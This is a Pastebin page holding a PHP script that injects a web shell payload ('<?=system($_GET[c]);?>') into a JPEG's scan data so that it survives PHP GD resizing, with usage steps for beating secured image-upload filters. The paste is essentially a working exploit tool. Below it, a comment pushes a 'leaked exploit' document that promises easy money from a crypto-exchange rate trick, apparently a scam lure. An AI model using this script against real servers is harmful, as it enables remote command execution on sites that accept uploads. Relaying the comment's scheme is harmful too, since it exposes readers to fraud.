API tools faq
paste
BlackFan

jpg_payload.php

BlackFan
Jul 2nd, 2013
8,134
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.68 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.     /*
  3.  
  4.     The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
  5.     caused by PHP functions imagecopyresized() and imagecopyresampled().
  6.     It is necessary that the size and quality of the initial image are the same as those of the processed
  7.     image.
  8.  
  9.     1) Upload an arbitrary image via secured files upload script
  10.     2) Save the processed image and launch:
  11.     php jpg_payload.php <jpg_name.jpg>
  12.  
  13.     In case of successful injection you will get a specially crafted image, which should be uploaded again.
  14.  
  15.     Since the most straightforward injection method is used, the following problems can occur:
  16.     1) After the second processing the injected data may become partially corrupted.
  17.     2) The jpg_payload.php script outputs "Something's wrong".
  18.     If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
  19.     initial image.
  20.  
  21.     Sergey Bobrov @Black2Fan.
  22.  
  23.     See also:
  24.     https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
  25.  
  26.     */
  27.  
  28.     $miniPayload = '<?=system($_GET[c]);?>';
  29.  
  30.     if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
  31.         die('php-gd is not installed');
  32.     }
  33.    
  34.     if(!isset($argv[1])) {
  35.         die('php jpg_payload.php <jpg_name.jpg>');
  36.     }
  37.  
  38.     set_error_handler("custom_error_handler");
  39.  
  40.     for($pad = 0; $pad < 1024; $pad++) {
  41.         $nullbytePayloadSize = $pad;
  42.         $dis = new DataInputStream($argv[1]);
  43.         $outStream = file_get_contents($argv[1]);
  44.         $extraBytes = 0;
  45.         $correctImage = TRUE;
  46.  
  47.         if($dis->readShort() != 0xFFD8) {
  48.             die('Incorrect SOI marker');
  49.         }
  50.  
  51.         while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
  52.             $marker = $dis->readByte();
  53.             $size = $dis->readShort() - 2;
  54.             $dis->skip($size);
  55.             if($marker === 0xDA) {
  56.                 $startPos = $dis->seek();
  57.                 $outStreamTmp =
  58.                     substr($outStream, 0, $startPos) .
  59.                     $miniPayload .
  60.                     str_repeat("\0",$nullbytePayloadSize) .
  61.                     substr($outStream, $startPos);
  62.                 checkImage('_'.$argv[1], $outStreamTmp, TRUE);
  63.                 if($extraBytes !== 0) {
  64.                     while((!$dis->eof())) {
  65.                         if($dis->readByte() === 0xFF) {
  66.                             if($dis->readByte !== 0x00) {
  67.                                 break;
  68.                             }
  69.                         }
  70.                     }
  71.                     $stopPos = $dis->seek() - 2;
  72.                     $imageStreamSize = $stopPos - $startPos;
  73.                     $outStream =
  74.                         substr($outStream, 0, $startPos) .
  75.                         $miniPayload .
  76.                         substr(
  77.                             str_repeat("\0",$nullbytePayloadSize).
  78.                                 substr($outStream, $startPos, $imageStreamSize),
  79.                             0,
  80.                             $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
  81.                                 substr($outStream, $stopPos);
  82.                 } elseif($correctImage) {
  83.                     $outStream = $outStreamTmp;
  84.                 } else {
  85.                     break;
  86.                 }
  87.                 if(checkImage('payload_'.$argv[1], $outStream)) {
  88.                     die('Success!');
  89.                 } else {
  90.                     break;
  91.                 }
  92.             }
  93.         }
  94.     }
  95.     unlink('payload_'.$argv[1]);
  96.     die('Something\'s wrong');
  97.  
  98.     function checkImage($filename, $data, $unlink = FALSE) {
  99.         global $correctImage;
  100.         file_put_contents($filename, $data);
  101.         $correctImage = TRUE;
  102.         imagecreatefromjpeg($filename);
  103.         if($unlink)
  104.             unlink($filename);
  105.         return $correctImage;
  106.     }
  107.  
  108.     function custom_error_handler($errno, $errstr, $errfile, $errline) {
  109.         global $extraBytes, $correctImage;
  110.         $correctImage = FALSE;
  111.         if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
  112.             if(isset($m[1])) {
  113.                 $extraBytes = (int)$m[1];
  114.             }
  115.         }
  116.     }
  117.  
  118.     class DataInputStream {
  119.         private $binData;
  120.         private $order;
  121.         private $size;
  122.  
  123.         public function __construct($filename, $order = false, $fromString = false) {
  124.             $this->binData = '';
  125.             $this->order = $order;
  126.             if(!$fromString) {
  127.                 if(!file_exists($filename) || !is_file($filename))
  128.                     die('File not exists ['.$filename.']');
  129.                 $this->binData = file_get_contents($filename);
  130.             } else {
  131.                 $this->binData = $filename;
  132.             }
  133.             $this->size = strlen($this->binData);
  134.         }
  135.  
  136.         public function seek() {
  137.             return ($this->size - strlen($this->binData));
  138.         }
  139.  
  140.         public function skip($skip) {
  141.             $this->binData = substr($this->binData, $skip);
  142.         }
  143.  
  144.         public function readByte() {
  145.             if($this->eof()) {
  146.                 die('End Of File');
  147.             }
  148.             $byte = substr($this->binData, 0, 1);
  149.             $this->binData = substr($this->binData, 1);
  150.             return ord($byte);
  151.         }
  152.  
  153.         public function readShort() {
  154.             if(strlen($this->binData) < 2) {
  155.                 die('End Of File');
  156.             }
  157.             $short = substr($this->binData, 0, 2);
  158.             $this->binData = substr($this->binData, 2);
  159.             if($this->order) {
  160.                 $short = (ord($short[1]) << 8) + ord($short[0]);
  161.             } else {
  162.                 $short = (ord($short[0]) << 8) + ord($short[1]);
  163.             }
  164.             return $short;
  165.         }
  166.  
  167.         public function eof() {
  168.             return !$this->binData||(strlen($this->binData) === 0);
  169.         }
  170.     }
  171. ?>
Advertisement
Comments
  • Mirpakar
    Mirpakar
    42 days
    # CSS 0.86 KB | 0 0
    view report reply
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1S1iTruSLkgEPO8QtTuo2twS4f2FoJ3_l0-p4GKqeAUY/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!